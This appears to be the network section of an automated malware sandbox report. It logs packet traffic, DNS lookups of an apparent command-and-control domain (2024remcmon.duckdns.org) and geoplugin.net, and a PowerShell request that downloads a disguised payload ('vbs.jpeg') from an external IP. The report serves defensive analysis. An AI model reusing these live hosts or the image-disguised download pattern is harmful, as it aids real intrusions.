                                Jul 27, 2024 13:32:10.191999912 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192013979 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192058086 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192058086 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192090988 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192107916 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192125082 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192142010 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192157984 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192173004 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192178011 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192178011 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192189932 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192204952 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192357063 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192374945 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192456961 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192490101 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192507029 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192513943 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192528963 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192547083 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192564011 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192579031 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192595959 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192605972 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192605972 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192620993 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192656994 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192706108 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192722082 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192764044 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192764997 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192811966 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192827940 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192846060 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192862988 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192888975 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192919970 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.192925930 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.192939043 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193036079 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193078995 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193094969 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193110943 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193126917 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193142891 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193157911 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193175077 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193178892 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193178892 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193209887 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193217039 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193303108 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193368912 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193387032 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193402052 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193418980 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193434954 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193439007 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193453074 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193469048 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193484068 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193499088 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193515062 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193515062 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193516016 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193532944 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193535089 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193604946 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193645954 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193696022 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193712950 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193806887 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193821907 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193839073 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193856001 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193866014 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193866014 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193866014 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193954945 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.193959951 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193977118 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.193990946 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194016933 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194031954 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194047928 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194063902 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194080114 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194088936 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194088936 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194088936 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194097996 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194132090 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194302082 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194318056 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194333076 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194350004 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194365978 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194408894 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194408894 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194408894 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194509983 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194576025 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194591045 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194663048 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194678068 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194693089 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194709063 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194735050 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.194736004 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194736004 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194736004 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.194852114 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.235285044 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.235308886 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.235328913 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.235373974 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.235445023 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.235462904 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.235479116 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.235496044 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.235553980 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.235554934 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.280694962 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280719995 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280738115 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280771971 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.280878067 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.280893087 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280910969 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280925989 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280941010 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280957937 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.280971050 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.280987024 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281001091 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281017065 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281029940 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281029940 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281032085 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281049967 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281065941 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281080961 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281097889 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281114101 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281124115 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281124115 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281124115 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281208038 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281223059 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281239033 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281343937 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281358957 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281388044 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281393051 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281393051 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281393051 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281404972 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281424046 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281440020 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281466961 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281466961 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281517982 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281533957 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281548977 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281650066 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281665087 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281678915 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281694889 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281709909 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281709909 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281709909 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281709909 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281728029 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281743050 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281759024 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281778097 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281778097 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281799078 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.281965971 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281981945 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.281996965 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282012939 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282027960 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282243967 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282243967 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282265902 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282286882 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282301903 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282332897 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282345057 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282345057 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282347918 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282366037 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282408953 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282422066 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282438040 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282454014 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282469988 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282485008 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282497883 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282531977 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282531977 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282531977 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282531977 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282582998 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282599926 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282602072 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282661915 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282700062 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282715082 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282731056 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282748938 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282794952 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282809973 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282852888 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.282924891 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282942057 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282957077 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282972097 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.282988071 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283004999 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283020020 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283035040 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283036947 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283036947 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283036947 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283133030 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283181906 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283181906 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283186913 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283206940 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283224106 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283279896 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283471107 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283471107 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283566952 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283584118 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283600092 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283657074 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283665895 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.283673048 CEST8049700192.3.176.154192.168.2.7
                                Jul 27, 2024 13:32:10.283818960 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.336505890 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.374304056 CEST4970080192.168.2.7192.3.176.154
                                Jul 27, 2024 13:32:10.374481916 CEST4969980192.168.2.7198.46.176.133
                                Jul 27, 2024 13:32:10.503483057 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:10.508538961 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:10.508615971 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:10.513662100 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:10.518562078 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:11.251564980 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:11.251593113 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:11.251709938 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:11.251791000 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:11.251838923 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:11.258089066 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:11.263025999 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:11.264856100 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:11.269927025 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:12.057651043 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:12.059465885 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:12.064471960 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:12.147814035 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:12.195837021 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:12.610335112 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:32:12.616935015 CEST8049702178.237.33.50192.168.2.7
                                Jul 27, 2024 13:32:12.617321968 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:32:12.626852989 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:32:12.631849051 CEST8049702178.237.33.50192.168.2.7
                                Jul 27, 2024 13:32:13.238667011 CEST8049702178.237.33.50192.168.2.7
                                Jul 27, 2024 13:32:13.238776922 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:32:13.250361919 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:13.261158943 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:14.235836029 CEST8049702178.237.33.50192.168.2.7
                                Jul 27, 2024 13:32:14.239087105 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:32:37.642496109 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:32:37.643899918 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:32:37.652359009 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:33:07.641957998 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:33:07.643182039 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:33:07.648416042 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:33:37.641433954 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:33:37.646392107 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:33:37.652286053 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:34:02.587014914 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:34:02.899440050 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:34:03.508713961 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:34:04.711869001 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:34:07.118211031 CEST4970280192.168.2.7178.237.33.50
                                Jul 27, 2024 13:34:07.657386065 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:34:07.659051895 CEST4970114645192.168.2.7192.210.214.9
                                Jul 27, 2024 13:34:07.664118052 CEST1464549701192.210.214.9192.168.2.7
                                Jul 27, 2024 13:34:11.933159113 CEST4970280192.168.2.7178.237.33.50
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 27, 2024 13:32:10.390510082 CEST5380053192.168.2.71.1.1.1
                                Jul 27, 2024 13:32:10.500576973 CEST53538001.1.1.1192.168.2.7
                                Jul 27, 2024 13:32:12.594779968 CEST6078653192.168.2.71.1.1.1
                                Jul 27, 2024 13:32:12.604116917 CEST53607861.1.1.1192.168.2.7
                                Jul 27, 2024 13:32:27.344022989 CEST53601081.1.1.1192.168.2.7
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 27, 2024 13:32:10.390510082 CEST192.168.2.71.1.1.10x70c0Standard query (0)2024remcmon.duckdns.orgA (IP address)IN (0x0001)false
                                Jul 27, 2024 13:32:12.594779968 CEST192.168.2.71.1.1.10xffb6Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 27, 2024 13:32:10.500576973 CEST1.1.1.1192.168.2.70x70c0No error (0)2024remcmon.duckdns.org192.210.214.9A (IP address)IN (0x0001)false
                                Jul 27, 2024 13:32:12.604116917 CEST1.1.1.1192.168.2.70xffb6No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                • 198.46.176.133
                                • 192.3.176.154
                                • geoplugin.net
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749699198.46.176.133803092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                Jul 27, 2024 13:32:06.849863052 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
                                Host: 198.46.176.133
                                Connection: Keep-Alive
                                Jul 27, 2024 13:32:07.589927912 CEST1236INHTTP/1.1 200 OK
                                Date: Sat, 27 Jul 2024 11:32:07 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                                ETag: "1d7285-61ce2d35c4b0c"
                                Accept-Ranges: bytes
                                Content-Length: 1929861
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: image/jpeg
                                Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
